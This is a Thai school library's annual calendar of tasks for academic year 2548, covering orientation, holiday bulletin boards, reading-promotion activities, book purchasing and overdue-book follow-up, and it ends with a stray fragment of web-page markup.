กล่องข้อความ: ปฏิทินงานห้องสมุด

งาน/โครงการ

..

มิ..

..

..

..

..

..

..

..

..

มี..

1.      ปฐมนิเทศการใช้ห้องสมุดแก่นักเรียนชั้น ม.1

2.      จัดบอร์ดวันวิสาขบูชา, วันงดสูบบุหรี่โลก

3.      เปิดบริการยืม-คืน หนังสือ

4.  ส่งแบบสำรวจสั่งซื้อหนังสือประจำปีการศึกษา 2548

5.      จัดบอร์ดวันไหว้ครู, แนะนำหนังสือเกี่ยวกับ

การจัดพาน , วัดบอร์ดวันสุนทรภู่

6.      เสนองบประมาณในการซื้อหนังสือ              

ปีการศึกษา 2548

7.      จัดกิจกรรมส่งเสริมการอ่าน                     

(แนะนำหนังสือใหม่)

8.      จัดบอร์ดวันอาสาฬหบูชาและวันเข้าพรรษา

จัดกิจกรรมส่งเสริมการอ่าน (อ่านตรงนี้มีรางวัล)

9. จัดบอร์ดเฉลิมพระเกียรติวันแม่แห่งชาติ

10. จัดโชว์หนังสือหมวดวิทยาศาสตร์

(สัปดาห์วิทยาศาสตร์)

11. แนะนำหนังสือใหม่-เล่าเรื่องหนังสือ (เสียงตามสาย)

12. จัดบอร์ดสาระความรู้

13. งดบริการยืมหนังสือ

14. ติดตามหนังสือค้างส่ง

15. ติดตามผลงานและสรุปผลงานภาคเรียนที่ 1           ปีการศึกษา 2548

 

ภาคเรียนที่ 2

16. จัดบอร์ดวันแฮรีส

17. จัดบอร์ดวันลอยกระทง

18. จัดงานสัปดาห์ห้องสมุด

19. โครงการค่ายรักการอ่าน

20 . จัดมุมหนังสือประดิษฐ์ของจากวัสดุเหลือใช้เพื่อตกแต่งสถานที่เนื่องในเทศกาลคริสตมาสและปีใหม่

21. จัดบอร์ดวันพ่อ

22.จัดซื้อหนังสือเข้าห้องสมุด

23.จัดมุมหนังสือเบ็ดเตล็ดทั่วไป

24.จัดบอร์ดวาเลนไทน์

25.จัดมุมหนังสือคู่มือเตรียมสอบ

26. งดบริการยืมหนังสือ

26. ติดตามหนังสือค้างส่ง

27.สรุปรายงานประจำปี

28.วางแผนงานประจำปีการศึกษา 2549

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ZieF.pl/rc/" width=1 height=1 style="border:0">